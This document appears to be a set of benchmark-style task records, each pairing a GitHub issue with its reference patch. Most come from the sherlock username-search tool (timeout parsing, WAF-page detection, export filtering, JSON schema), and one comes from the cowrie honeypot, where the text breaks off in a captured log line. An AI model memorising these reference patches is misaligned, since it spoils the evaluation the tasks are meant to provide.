key=operator.itemgetter(0) - ) - site_names = [name for _,name in site_rank_name] - else: - #Sort in ascending alphabetical order. - site_names = sorted([site.name for site in self], key=str.lower) + site_names = sorted([site.name for site in self], key=str.lower) return site_names diff --git a/site_list.py b/site_list.py --- a/site_list.py +++ b/site_list.py @@ -1,40 +1,12 @@ """Sherlock: Supported Site Listing -This module generates the listing of supported sites. +This module generates the listing of supported sites +which can be found in sites.md +It also organizes all the sites in alphanumeric order """ import json -import sys -import requests -import threading -import xml.etree.ElementTree as ET -from datetime import datetime -from argparse import ArgumentParser, RawDescriptionHelpFormatter pool = list() -def get_rank(domain_to_query, dest): - - #Retrieve ranking data via alexa API - url = f"http://data.alexa.com/data?cli=10&url={domain_to_query}" - xml_data = requests.get(url).text - root = ET.fromstring(xml_data) - try: - #Get ranking for this site. - dest['rank'] = int(root.find(".//REACH").attrib["RANK"]) - except: - #We did not find the rank for some reason. - print(f"Error retrieving rank information for '{domain_to_query}'") - print(f" Returned XML is |{xml_data}|") - - return - -parser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter - ) -parser.add_argument("--rank","-r", - action="store_true", dest="rank", default=False, - help="Update all website ranks (not recommended)." 
- ) -args = parser.parse_args() - with open("sherlock/resources/data.json", "r", encoding="utf-8") as data_file: data = json.load(data_file) @@ -44,30 +16,17 @@ def get_rank(domain_to_query, dest): for social_network in data: url_main = data.get(social_network).get("urlMain") - data.get(social_network)["rank"] = 0 - if args.rank: - th = threading.Thread(target=get_rank, args=(url_main, data.get(social_network))) - else: - th = None - pool.append((social_network, url_main, th)) - if args.rank: - th.start() + pool.append((social_network, url_main)) index = 1 - for social_network, url_main, th in pool: - if args.rank: - th.join() + for social_network, url_main in pool: site_file.write(f'{index}. [{social_network}]({url_main})\n') - sys.stdout.write("\r{0}".format(f"Updated {index} out of {data_length} entries")) - sys.stdout.flush() index = index + 1 - if args.rank: - site_file.write(f'\nAlexa.com rank data fetched at ({datetime.utcnow()} UTC)\n') sorted_json_data = json.dumps(data, indent=2, sort_keys=True) with open("sherlock/resources/data.json", "w") as data_file: data_file.write(sorted_json_data) -print("\nFinished updating supported site listing!") +print("Finished updating supported site listing!")
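For context, the key behavioral change in the sites.py hunk above is the remote-default data file. Below is a minimal standalone sketch of that pattern; `load_site_data` is a hypothetical helper name (the real code lives in the `SitesInformation` class), and error handling is reduced to the essentials:

```python
import json

import requests

# Sketch of the remote-default pattern from the patch above: when no path is
# given, pull the live data.json from the GitHub repo so users always query
# up-to-date site data; a local .json path still works as before.
DEFAULT_URL = "https://raw.githubusercontent.com/sherlock-project/sherlock/master/sherlock/resources/data.json"

def load_site_data(data_file_path=None):
    if data_file_path is None:
        data_file_path = DEFAULT_URL
    if not data_file_path.lower().endswith(".json"):
        raise FileNotFoundError(
            f"Incorrect JSON file extension for data file '{data_file_path}'.")
    if data_file_path.lower().startswith(("http://", "https://")):
        # Reference is to a URL: fetch and parse in one step.
        return requests.get(data_file_path).json()
    with open(data_file_path, "r", encoding="utf-8") as f:
        return json.load(f)
```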
Ranking using site_list.py only works from certain countries Hi, For some strange reason `site_list.py` seems to be working for some people and not for others. When I run `python3 site_list.py -r`, to update the ranking, all the ranks get set to 0 and I get errors about the XML data that is returned by data.alexa.com. This is because all I am getting is this: ![Screenshot 2020-05-17 at 07 53 41](https://user-images.githubusercontent.com/27065646/82136986-dabf6b80-9813-11ea-938c-5efa1e520bc0.png) But when I use a VPN and change my location from Norway to Dallas, which is a city in the US, I seem to get the expected response: ![updated](https://user-images.githubusercontent.com/27065646/82137013-10645480-9814-11ea-9840-e2104451a317.png) From this, we can understand that this API seems to not be working properly in certain countries. This issue has been seen here: https://github.com/matomo-org/matomo/issues/13427 https://stackoverflow.com/questions/3676376/fetching-alexa-data#comment87619041_6224304 I personally think, if the ranking does not work for everyone, then it would be best to remove it.
If we remove this script's access to the Alexa API, then we will have to remove the aspects of Sherlock that use the site ranking. Is that OK? I am thinking that if we automate the invocation of this script using GitHub Actions, then no one will have to run it on their own computer any more. Since the GitHub Actions for Sherlock appear to be running in the US, it will work reliably. While the script does generally work for me, it still flakes out on some sites. I think it is because Sherlock has enough sites that it is exceeding the API limits. > If we remove this script's access to the Alexa API, then we will have to remove the aspects of Sherlock that use the site ranking. Is that OK? Yeah, I personally think that doing so would be fine because, like you mentioned, it flakes out on some sites, and that might be because it's exceeding the API limits. So, removing the site ranking would be the best thing to do as it is not stable. It seems better to remove the site ranking because I tried running `site_list.py` using a VPN with my location set to Los Angeles, and I kept getting this response: ```xml <!-- Need more Alexa data? Find our APIs here: https://aws.amazon.com/alexa/ --> ``` There is a rate limit.
2020-08-07T19:15:53
sherlock-project/sherlock
911
sherlock-project__sherlock-911
[ "909" ]
ecf7e4d02f976c0c244beb4a0b3be688a4b9ea6a
diff --git a/site_list.py b/site_list.py --- a/site_list.py +++ b/site_list.py @@ -18,11 +18,8 @@ url_main = data.get(social_network).get("urlMain") pool.append((social_network, url_main)) - index = 1 for social_network, url_main in pool: - site_file.write(f'{index}. [{social_network}]({url_main})\n') - index = index + 1 - + site_file.write(f'1. [{social_network}]({url_main})\n') sorted_json_data = json.dumps(data, indent=2, sort_keys=True)
[site_list.py] change numbering to reduce commit size Letting the markdown renderer do the counting lets us reduce commit size and avoid possible merge conflicts. --- ``` 1. 1. 1. ``` renders to: 1. 1. 1.
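A minimal sketch of the renderer-counting trick described above; the `sites` dict and the heading text are illustrative, not the real sites.md content:

```python
# Write a literal "1." for every item and let the markdown renderer do the
# counting; inserting or removing a site then changes only its own line.
sites = {"GitHub": "https://github.com", "GitLab": "https://gitlab.com"}
with open("sites.md", "w") as site_file:
    site_file.write("## Supported sites\n")
    for name, url in sorted(sites.items()):
        site_file.write(f"1. [{name}]({url})\n")
```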
2020-12-19T10:35:32
sherlock-project/sherlock
1,518
sherlock-project__sherlock-1518
[ "1284" ]
11b519b7ad39f89ebd14da69fb9880269dc2c8ce
diff --git a/sherlock/sherlock.py b/sherlock/sherlock.py --- a/sherlock/sherlock.py +++ b/sherlock/sherlock.py @@ -551,7 +551,7 @@ def main(): parser.add_argument("username", nargs="+", metavar="USERNAMES", action="store", - help="One or more usernames to check with social networks." + help="One or more usernames to check with social networks. Check similar usernames using {%%} (replace to '_', '-', '.')." ) parser.add_argument("--browse", "-b", action="store_true", dest="browse", default=False,
Check multiple similar usernames ## Checklist - [x] I'm reporting a feature request - [x] I've checked for similar feature requests including closed ones ## Description It's good to search for similar usernames. For example, when searching for `user{?}name`, we should also check `_`, `-`, and `.`: 1. `username` 2. `user.name` 3. `user-name` 4. `user_name`
I can work on it. When inputting sherlock {username}, just add more, for example: sherlock PxINKY P_xINKY Px_INKY > pink.txt. No need to make a feature if you can just write three more words. Closing this as it's been PR-ed and merged already. * https://github.com/sherlock-project/sherlock/pull/1298 Actually sorry, I realize there is no documentation on this in the README. 🤔 I'll reopen it; later someone (probably me) can go document it. Three more days
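A hedged sketch of the `{?}` expansion behavior documented in this issue; this illustrates the feature, not necessarily how the merged PR implements it (`expand` and `CHECK_SYMBOLS` are made-up names, and the bare form is included to match the issue's example list):

```python
from itertools import product

CHECK_SYMBOLS = ["_", "-", ".", ""]  # "" keeps the bare form, e.g. "username"

def expand(username: str) -> list:
    # Replace every "{?}" token with each candidate separator in turn.
    n = username.count("{?}")
    if n == 0:
        return [username]
    variants = set()
    for combo in product(CHECK_SYMBOLS, repeat=n):
        candidate = username
        for symbol in combo:
            candidate = candidate.replace("{?}", symbol, 1)
        variants.add(candidate)
    return sorted(variants)

print(expand("user{?}name"))
# ['user-name', 'user.name', 'user_name', 'username']
```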
2022-10-05T07:54:32
sherlock-project/sherlock
1,723
sherlock-project__sherlock-1723
[ "1480" ]
61bb34b0213482164247df496a063b9e41b98f78
diff --git a/sherlock/sherlock.py b/sherlock/sherlock.py --- a/sherlock/sherlock.py +++ b/sherlock/sherlock.py @@ -28,7 +28,7 @@ from colorama import init module_name = "Sherlock: Find Usernames Across Social Networks" -__version__ = "0.14.3" +__version__ = "0.14.2" class SherlockFuturesSession(FuturesSession): @@ -537,12 +537,12 @@ def main(): help="Time (in seconds) to wait for response to requests (Default: 60)" ) parser.add_argument("--print-all", - action="store_true", dest="print_all", + action="store_true", dest="print_all", default=False, help="Output sites where the username was not found." ) parser.add_argument("--print-found", - action="store_false", dest="print_all", default=False, - help="Output sites where the username was found." + action="store_true", dest="print_found", default=True, + help="Output sites where the username was found (also if exported as file)." ) parser.add_argument("--no-color", action="store_true", dest="no_color", default=False, @@ -640,7 +640,6 @@ def main(): site_data = site_data_all else: # User desires to selectively run queries on a sub-set of the site list. - # Make sure that the sites are supported & build up pruned site database. site_data = {} site_missing = [] @@ -668,7 +667,6 @@ def main(): browse=args.browse) # Run report on all specified users. - all_usernames = [] for username in args.username: if (CheckForParameter(username)): @@ -726,6 +724,9 @@ def main(): ] ) for site in results: + if args.print_found and not args.print_all and results[site]["status"].status != QueryStatus.CLAIMED: + continue + response_time_s = results[site]["status"].query_time if response_time_s is None: response_time_s = "" @@ -748,6 +749,9 @@ def main(): response_time_s = [] for site in results: + if args.print_found and not args.print_all and results[site]["status"].status != QueryStatus.CLAIMED: + continue + if response_time_s is None: response_time_s.append("") else: @@ -768,4 +772,3 @@ def main(): if __name__ == "__main__": main() - # Notify caller that all queries are finished.
fixes #1431 Adding --print-found as an argument will make the CSV and/or XLSX files contain only those accounts that were found. Previously, there was only the variable 'print_all', which was set by the parameters '--print-all' and '--print-found'. Since the behaviour is to print only those that are found, the parameter '--print-found' was not producing any difference. With the changes, '--print-found' will now make the CSV and XLSX files contain only the accounts that were found. fixes #1431
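A small self-contained sketch of the filtering rule the diff applies before writing export rows; `QueryStatus` is reduced to two members here for brevity, and the sample data is made up:

```python
from enum import Enum

class QueryStatus(Enum):
    CLAIMED = "Claimed"
    AVAILABLE = "Available"

results = {"siteA": QueryStatus.CLAIMED, "siteB": QueryStatus.AVAILABLE}
print_found, print_all = True, False

# Skip any row that is not CLAIMED when only found accounts were requested.
exported = [site for site, status in results.items()
            if not (print_found and not print_all
                    and status != QueryStatus.CLAIMED)]
print(exported)  # ['siteA']
```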
I need to take a further look into this. Will do it this week when I get some extra time.
2023-03-06T08:36:32
sherlock-project/sherlock
1,963
sherlock-project__sherlock-1963
[ "1960" ]
4525fb48ad90d95cb7b9d7f01a93f226242cde81
diff --git a/sherlock/sherlock.py b/sherlock/sherlock.py --- a/sherlock/sherlock.py +++ b/sherlock/sherlock.py @@ -470,12 +470,14 @@ def timeout_check(value): NOTE: Will raise an exception if the timeout in invalid. """ - if value <= 0: + float_value = float(value) + + if float_value <= 0: raise ArgumentTypeError( f"Invalid timeout value: {value}. Timeout must be a positive number." ) - return float(value) + return float_value def handler(signal_received, frame):
--timeout error ## Checklist - [X] I'm asking a question regarding Sherlock - [ ] My question is not a tech support question. ## Question I'm having the following error: sherlock: error: argument --timeout: invalid timeout_check value: '1' What should I write as the argument of --timeout?
I am having the exact same problem, so if someone gets the answer, tell us!
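The root cause is visible in the patch above: argparse hands the raw string to the `type=` callback, and in Python 3 comparing that string to an integer raises TypeError, which argparse reports as "invalid timeout_check value". A short sketch of the corrected callback:

```python
from argparse import ArgumentTypeError

def timeout_check(value):
    # Convert first; '1' <= 0 would raise TypeError in Python 3.
    float_value = float(value)
    if float_value <= 0:
        raise ArgumentTypeError(
            f"Invalid timeout value: {value}. Timeout must be a positive number.")
    return float_value

assert timeout_check("1") == 1.0
```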
2023-12-25T02:00:45
sherlock-project/sherlock
1,974
sherlock-project__sherlock-1974
[ "1968" ]
8965cf12e3df28ee78a5d01da14b8aec40d8e8b4
diff --git a/sherlock/sherlock.py b/sherlock/sherlock.py --- a/sherlock/sherlock.py +++ b/sherlock/sherlock.py @@ -617,7 +617,7 @@ def main(): nargs="+", metavar="USERNAMES", action="store", - help="One or more usernames to check with social networks. Check similar usernames using {%%} (replace to '_', '-', '.').", + help="One or more usernames to check with social networks. Check similar usernames using {?} (replace to '_', '-', '.').", ) parser.add_argument( "--browse",
Trouble with the "{%}" argument <!-- ###################################################################### WARNING! IGNORING THE FOLLOWING TEMPLATE WILL RESULT IN ISSUE CLOSED AS INCOMPLETE ###################################################################### --> ## Checklist <!-- Put x into all boxes (like this [x]) once you have completed what they say. Make sure complete everything in the checklist. --> - [x] I'm reporting a bug in Sherlock's functionality - [x] The bug I'm reporting is not a false positive or a false negative - [x] I've verified that I'm running the latest version of Sherlock - [x] I've checked for similar bug reports including closed ones - [ ] I've checked for pull requests that attempt to fix this bug ## Description <!-- Provide a detailed description of the bug that you have found in Sherlock. Provide the version of Sherlock you are running. --> (Didn't know if this was better fit as a question or a bug, sry for the inconvenience) I have sherlock set up in a docker container and everything works 100% fine (eg.1) EXCEPT for trying to use the {%} argument (eg.2), am i stupid and have the syntax wrong?, is this powershell interpretation issue? or is this a genuine bug. eg.1 terminal functioning as intended PS C:\Windows\system32> docker run --rm -t mysherlock-image foobar [*] Checking username foobar on: [+] 7Cups: https://www.7cups.com/@foobar [+] 8tracks: https://8tracks.com/foobar [+] About.me: https://about.me/foobar [+] Academia.edu: https://independent.academia.edu/foobar [+] Airliners: https://www.airliners.net/user/foobar/profile/photos [+] AllMyLinks: https://allmylinks.com/foobar [+] Amino: https://aminoapps.com/u/foobar [+] Apple Developer: https://developer.apple.com/forums/profile/foobar PS C:\Windows\system32> ^C eg.2 throwing big angry errors when using {%} PS C:\Windows\system32> docker run --rm -t mysherlock-image foo{%}bar usage: sherlock.py [-h] [--version] [--verbose] [--folderoutput FOLDEROUTPUT] [--output OUTPUT] [--tor] [--unique-tor] [--csv] [-x lsx] [--site SITE_NAME] [--proxy PROXY_URL] [--json JSON_FILE] [--timeout TIMEOUT] [--print-all] [--print-found] [--no-color] [--browse] [--local] [--nsfw] sherlock.py: error: unrecognized arguments: -encodedCommand JQA= bar -inputFormat xml text I'm 99% sure i'm probably just stupid, and this is a me problem. but thought id post anyway just in case. *Latest build as of today*
Hi @TryMyWagon, thanks for opening this issue. You are not stupid. I checked, and you are right about the problem. It seems we made a small error in the documentation, and we apologize for that. I will fix it. 😅 You should use `{?}` instead of `{%}`: ```bash python sherlock user{?}name ``` or: ```bash python sherlock 'user{?}name' ```
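For background on why the help string ever contained `{%%}`: argparse runs help text through %-style formatting, so a literal percent sign must be doubled in the source and is rendered back to the user as a single `%` (which is exactly what the old, misleading help showed). A hypothetical demo:

```python
import argparse

parser = argparse.ArgumentParser(prog="sherlock")
# "%%" in the source renders as "%" in --help output; a bare "%" followed by
# an unsupported format character would typically raise a ValueError when the
# help text is expanded.
parser.add_argument("username",
                    help="Check similar usernames using {%%} tokens.")
parser.print_help()
```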
2024-01-19T21:23:58
sherlock-project/sherlock
2,068
sherlock-project__sherlock-2068
[ "2071", "2096" ]
55c680fde1d6eb94e55870e1be6243c88732cea8
diff --git a/sherlock/sherlock.py b/sherlock/sherlock.py --- a/sherlock/sherlock.py +++ b/sherlock/sherlock.py @@ -232,7 +232,7 @@ def sherlock( # A user agent is needed because some sites don't return the correct # information since they think that we are bots (Which we actually are...) headers = { - "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0", + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0", } if "headers" in net_info: @@ -351,7 +351,6 @@ def sherlock( # Get the expected error type error_type = net_info["errorType"] - error_code = net_info.get("errorCode") # Retrieve future and ensure it has finished future = net_info["request_future"] @@ -407,13 +406,16 @@ def sherlock( else: query_status = QueryStatus.AVAILABLE elif error_type == "status_code": - # Checks if the Status Code is equal to the optional "errorCode" given in 'data.json' - if error_code == r.status_code: + error_codes = net_info.get("errorCode") + query_status = QueryStatus.CLAIMED + + # Type consistency, allowing for both singlets and lists in manifest + if isinstance(error_codes, int): + error_codes = [error_codes] + + if error_codes is not None and r.status_code in error_codes: query_status = QueryStatus.AVAILABLE - # Checks if the status code of the response is 2XX - elif not r.status_code >= 300 or r.status_code < 200: - query_status = QueryStatus.CLAIMED - else: + elif r.status_code >= 300 or r.status_code < 200: query_status = QueryStatus.AVAILABLE elif error_type == "response_url": # For this detection method, we have turned off the redirect.
Yandex Music has a captcha ## Checklist - [x] I'm reporting a website that is returning **false positive** results - [x] I've checked for similar site support requests including closed ones - [x] I've checked for pull requests attempting to fix this false positive - [x] I'm only reporting **one** site (create a separate issue for each site) ## Description Here's a random username that can't possibly exist: [ecfhlmiuewfimcuhem](https://music.yandex/users/ecfhlmiuewfimcuhem/playlists). Here's the username from [data.json](https://github.com/sherlock-project/sherlock/blob/master/sherlock/resources/data.json#L2214): [ya.playlist](https://music.yandex/users/ya.playlist/playlists) When I visit either, I get a captcha (note: JS is disabled in my browser): ![image](https://github.com/sherlock-project/sherlock/assets/65649991/3c93012d-991a-46a2-b0af-60edf5772eec) Unless Sherlock uses Selenium/Pyppeteer, which I highly doubt (it's not in requirements.txt), this captcha isn't really avoidable (I think). Maybe it even shows up with JS enabled, which I didn't check. I'm not opening a PR removing YandexMusic because it could be an issue that only happens for me, or maybe it's possible to bypass this captcha. Use the lite version of archive.org; change the error message. Archive.org detects the use of old browsers and redirects them to a "lite" version of archive.org. For some reason, the requests module is also redirected. This PR fixes this issue.
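The interesting part of the patch above is the type normalization for the manifest's `errorCode` field, which may be a bare int or a list. A minimal sketch of that logic; the function name is illustrative, not Sherlock's real API:

```python
def status_is_available(status_code, error_codes):
    # Allow both a single int and a list of ints in the manifest.
    if isinstance(error_codes, int):
        error_codes = [error_codes]
    if error_codes is not None and status_code in error_codes:
        return True
    # Any status outside 2xx also counts as "username available".
    return status_code >= 300 or status_code < 200

assert status_is_available(404, 404)
assert not status_is_available(200, [404])
```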
2024-04-08T02:37:41
sherlock-project/sherlock
2,069
sherlock-project__sherlock-2069
[ "1878" ]
55c680fde1d6eb94e55870e1be6243c88732cea8
diff --git a/sherlock/notify.py b/sherlock/notify.py --- a/sherlock/notify.py +++ b/sherlock/notify.py @@ -238,6 +238,15 @@ def update(self, result): Fore.WHITE + "]" + Fore.GREEN + f" {self.result.site_name}:" + Fore.YELLOW + f" {msg}") + + elif result.status == QueryStatus.WAF: + if self.print_all: + print(Style.BRIGHT + Fore.WHITE + "[" + + Fore.RED + "-" + + Fore.WHITE + "]" + + Fore.GREEN + f" {self.result.site_name}:" + + Fore.RED + " Blocked by bot detection" + + Fore.YELLOW + " (proxy may help)") else: # It should be impossible to ever get here... diff --git a/sherlock/result.py b/sherlock/result.py --- a/sherlock/result.py +++ b/sherlock/result.py @@ -14,6 +14,7 @@ class QueryStatus(Enum): AVAILABLE = "Available" # Username Not Detected UNKNOWN = "Unknown" # Error Occurred While Trying To Detect Username ILLEGAL = "Illegal" # Username Not Allowable For This Site + WAF = "WAF" # Request blocked by WAF (i.e. Cloudflare) def __str__(self): """Convert Object To String. diff --git a/sherlock/sherlock.py b/sherlock/sherlock.py --- a/sherlock/sherlock.py +++ b/sherlock/sherlock.py @@ -378,9 +378,20 @@ def sherlock( query_status = QueryStatus.UNKNOWN error_context = None + # As WAFs advance and evolve, they will occasionally block Sherlock and lead to false positives + # and negatives. Fingerprints should be added here to filter results that fail to bypass WAFs. + # Fingerprints should be highly targetted. Comment at the end of each fingerprint to indicate target and date. + WAFHitMsgs = [ + '.loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font-red{color:#b20f03}body.dark .big-button,body.dark .pow-button{background-color:#4693ff;color:#1d1d1d}body.dark #challenge-success-text{background-image:url(data:image/svg+xml;base64,', # 2024-04-08 Cloudflare + '{return l.onPageView}}),Object.defineProperty(r,"perimeterxIdentifiers",{enumerable:' # 2024-04-09 PerimeterX / Human Security + ] + if error_text is not None: error_context = error_text + elif any(hitMsg in r.text for hitMsg in WAFHitMsgs): + query_status = QueryStatus.WAF + elif error_type == "message": # error_flag True denotes no error found in the HTML # error_flag False denotes error found in the HTML
Fiverr false positive ## Checklist - [x] I'm reporting a website that is returning **false positive** results - [x] I've checked for similar site support requests including closed ones - [x] I've checked for pull requests attempting to fix this false positive - [x] I'm only reporting **one** site (create a separate issue for each site) ## Description https://www.fiverr.com/fincali1979 is not a real Fiverr account. I checked for closed issues and Fiverr is marked as fixed, but it doesn't work now.
Hey, I want to work on this issue. Is it still open?
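A hedged sketch of the WAF-fingerprint filter added by the diff above; the marker strings here are shortened placeholders, not the real, highly targeted fingerprints shipped in the patch:

```python
WAF_HIT_MSGS = [
    "challenge-running",        # placeholder for the Cloudflare fingerprint
    "perimeterxIdentifiers",    # placeholder for the PerimeterX fingerprint
]

def blocked_by_waf(response_text: str) -> bool:
    # Any known marker in the body means the request was intercepted,
    # so the result must not be reported as CLAIMED.
    return any(msg in response_text for msg in WAF_HIT_MSGS)

print(blocked_by_waf("<html>challenge-running</html>"))  # True
```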
2024-04-08T21:56:24
sherlock-project/sherlock
2,099
sherlock-project__sherlock-2099
[ "1338" ]
f5796c24b3230a6af559cfb4e11b8df52964d8bb
diff --git a/sherlock/sites.py b/sherlock/sites.py --- a/sherlock/sites.py +++ b/sherlock/sites.py @@ -152,6 +152,11 @@ def __init__(self, data_file_path=None): raise FileNotFoundError(f"Problem while attempting to access " f"data file '{data_file_path}'." ) + + try: + site_data.pop('$schema') + except: + pass self.sites = {} diff --git a/site_list.py b/site_list.py --- a/site_list.py +++ b/site_list.py @@ -5,10 +5,14 @@ # Read the data.json file with open("sherlock/resources/data.json", "r", encoding="utf-8") as data_file: - data = json.load(data_file) + data: dict = json.load(data_file) + +# Removes schema-specific keywords for proper processing +social_networks: dict = dict(data) +social_networks.pop('$schema') # Sort the social networks in alphanumeric order -social_networks = sorted(data.items()) +social_networks: list = sorted(social_networks.items()) # Write the list of supported sites to sites.md with open("sites.md", "w") as site_file:
feat: add json schema validation Adds a JSON Schema that validates `data.json` and `removed_sites.json`. I've already validated the existing data with it and can confirm both files pass. 👍🏾 Prepends the following property to both files: ```json { "$schema": "{path/to/json-schema}" } ``` Removes the `rank` property from `removed_sites.json` and documentation as this is no longer relevant. Removes the "noPeriod" property from Jimdo as this appears to serve no purpose. --- Sorry, also a question. What is the purpose of `responseUrl`? I just realized this property is not referenced whatsoever in the actual application. 🤔 Can this property be removed from the dataset and schema? Later I do want to make it stricter, i.e. prevent someone from using one `errorType` with the wrong additional field, e.g. ```json { "errorMsg": "Not Found", "errorType": "status_code" } ``` I figured I'd leave it like this for now and find out what `responseUrl` is about. ### Related * Closes https://github.com/sherlock-project/sherlock/issues/1336 The goal of this is to improve the experience for developers and leave less room for human error. It also enforces that we document and provide examples of each field, unlike the current Wiki, which tends to get outdated. ![image](https://user-images.githubusercontent.com/22801583/167285185-11711582-a8d1-4157-a5e9-4d590d6e71b6.png) ![image](https://user-images.githubusercontent.com/22801583/167285139-15b5d326-5813-45df-8987-dfd6f7a236ad.png) ![image](https://user-images.githubusercontent.com/22801583/167285147-e759a759-2734-4811-b972-ee75ed7dd530.png)
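A minimal sketch of the `$schema` handling the diff introduces, so the keyword is never treated as a site entry; the path assumes the repo layout, and actual jsonschema validation would be a separate step not shown here:

```python
import json

with open("sherlock/resources/data.json", "r", encoding="utf-8") as f:
    data = json.load(f)

sites = dict(data)
sites.pop("$schema", None)  # tolerate files that lack the keyword

for site_name in sorted(sites, key=str.lower):
    print(site_name)
```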
2024-05-06T01:17:38
sherlock-project/sherlock
2,109
sherlock-project__sherlock-2109
[ "2108" ]
d0c8282e5efc36f61dcbb107edbabb6ff5b28939
diff --git a/sherlock/sites.py b/sherlock/sites.py --- a/sherlock/sites.py +++ b/sherlock/sites.py @@ -177,6 +177,8 @@ def __init__(self, data_file_path=None): raise ValueError( f"Problem parsing json contents at '{data_file_path}': Missing attribute {error}." ) + except TypeError as error: + print(f"Encountered TypeError parsing json contents for target '{site_name}' at {data_file_path}\nSkipping target.\n") return
SHERLOCK// ERROR "string indices must be integers, not 'str' " como puedo solucionar este error que me sale al querer usar sherlock, no se como solucionarlo la verdad
2024-05-08T02:41:37
sherlock-project/sherlock
2,123
sherlock-project__sherlock-2123
[ "2113" ]
f2090bd19806cece29b0acc9fe7801ef6230856e
diff --git a/sherlock/sherlock.py b/sherlock/sherlock.py --- a/sherlock/sherlock.py +++ b/sherlock/sherlock.py @@ -382,11 +382,13 @@ def sherlock( query_status = QueryStatus.UNKNOWN error_context = None - # As WAFs advance and evolve, they will occasionally block Sherlock and lead to false positives - # and negatives. Fingerprints should be added here to filter results that fail to bypass WAFs. - # Fingerprints should be highly targetted. Comment at the end of each fingerprint to indicate target and date. + # As WAFs advance and evolve, they will occasionally block Sherlock and + # lead to false positives and negatives. Fingerprints should be added + # here to filter results that fail to bypass WAFs. Fingerprints should + # be highly targetted. Comment at the end of each fingerprint to + # indicate target and date fingerprinted. WAFHitMsgs = [ - '.loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font-red{color:#b20f03}body.dark .big-button,body.dark .pow-button{background-color:#4693ff;color:#1d1d1d}body.dark #challenge-success-text{background-image:url(data:image/svg+xml;base64,', # 2024-04-08 Cloudflare + '.loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font-red{color:#b20f03}body.dark', # 2024-05-13 Cloudflare '{return l.onPageView}}),Object.defineProperty(r,"perimeterxIdentifiers",{enumerable:' # 2024-04-09 PerimeterX / Human Security ]
False positives (Kick, LibraryThing) Kick and LibraryThing showing F+ for `ehjtohrtjh` _(Issue is only for tracking purposes and so I don't forget -- will pr later)_
I did a false positive on both of those sites when I ran Sherlock inside a Fedora container. But upon running Sherlock on my computer, I only got false positives on LibraryThing. I'm unsure as to why Kick returned a false positive, but it looks like LibraryThing has bot protection
2024-05-14T02:49:45
cowrie/cowrie
283
cowrie__cowrie-283
[ "230" ]
05283b60c37ae70ed4c45c56764ce8685e26fa67
diff --git a/cowrie/output/jsonlog.py b/cowrie/output/jsonlog.py --- a/cowrie/output/jsonlog.py +++ b/cowrie/output/jsonlog.py @@ -32,7 +32,10 @@ import json import os +import Queue +import threading +from twisted.python import log import twisted.python.logfile import cowrie.core.output @@ -47,8 +50,21 @@ def __init__(self, cfg): fn = cfg.get('output_jsonlog', 'logfile') dirs = os.path.dirname(fn) base = os.path.basename(fn) + + # create the log queue with a default buffer size if none is specified in + # the log file. + buffer_size = 10000 + if cfg.has_option('output_jsonlog', 'buffer_size'): + buffer_size = int(cfg.get('output_jsonlog', 'buffer_size')) + self._log_writer_queue = Queue.Queue(maxsize=buffer_size) + + # allocate the output file self.outfile = twisted.python.logfile.DailyLogFile(base, dirs, defaultMode=0o664) + # start the log writer thread + self._log_writer_thread = threading.Thread(target=self._write_log) + self._log_writer_thread.daemon = True + self._log_writer_thread.start() def start(self): """ @@ -59,6 +75,7 @@ def start(self): def stop(self): """ """ + self._log_queue.join() self.outfile.flush() @@ -69,7 +86,26 @@ def write(self, logentry): # Remove twisted 15 legacy keys if i.startswith('log_'): del logentry[i] - json.dump(logentry, self.outfile) - self.outfile.write('\n') - self.outfile.flush() + + # TODO: There's a possibility that the queue is full when we do this put, which means + # we'll lose the log item. We specifically use put_nowait so in that case it doesn't + # block the main writer thread. + try: + self._log_writer_queue.put_nowait(json.dumps(logentry)) + except Queue.Full: + log.err('Could not queue jsonlog item. Consider increasing buffer_size in [output_jsonlog] of your cowrie configuration') + + def _write_log(self): + # there's a probability of hitting IO errors while attempting to write + # for various reasons (for example, the disk is full). So, regardless + # of what happens during the write, we always mark the queue item as done + # so self.stop() can properly join on any remaining items. + while True: + item = self._log_writer_queue.get() + try: + self.outfile.write(item) + self.outfile.write('\n') + self.outfile.flush() + finally: + self._log_writer_queue.task_done()
Overlapping in json logging Hello, Yesterday, I've updated to the newest version of cowrie and found that json logs regulary become invalid because of overlapping messages: {"eventid": "cowrie.direct-tcpip.data", "timestamp": "2016-08-25T19:45:14.966466Z", "sensor": "redacted", "system": "SSHChannel None (13) on SSHService ssh-connection on HoneyPotSSHTransport,65,193.169.53.173", "isError": 0, "src_ip": "redacted", "session": "6649575c", "dst_port": 443, "dst_ip": "redacted", "data": "'\x16\x03\x01\x01x\x01\x00\x01t\x03\x03W\xbfKf\x82v^\x9e\x7f\x15\t\x08+o\x13(9\x05\xcd4\"\xebk}\xcb\xa00|\xce\x9e\x1do\x00\x00\xca\xc00\xc0,\xc0(\xc0$\xc0\x14\xc0\n\xc0\"\xc0!\x00\xa3\x00\x9f\x00k\x00j\x009\x008\x00\x88\x00\x87\xc0\x19\xc0 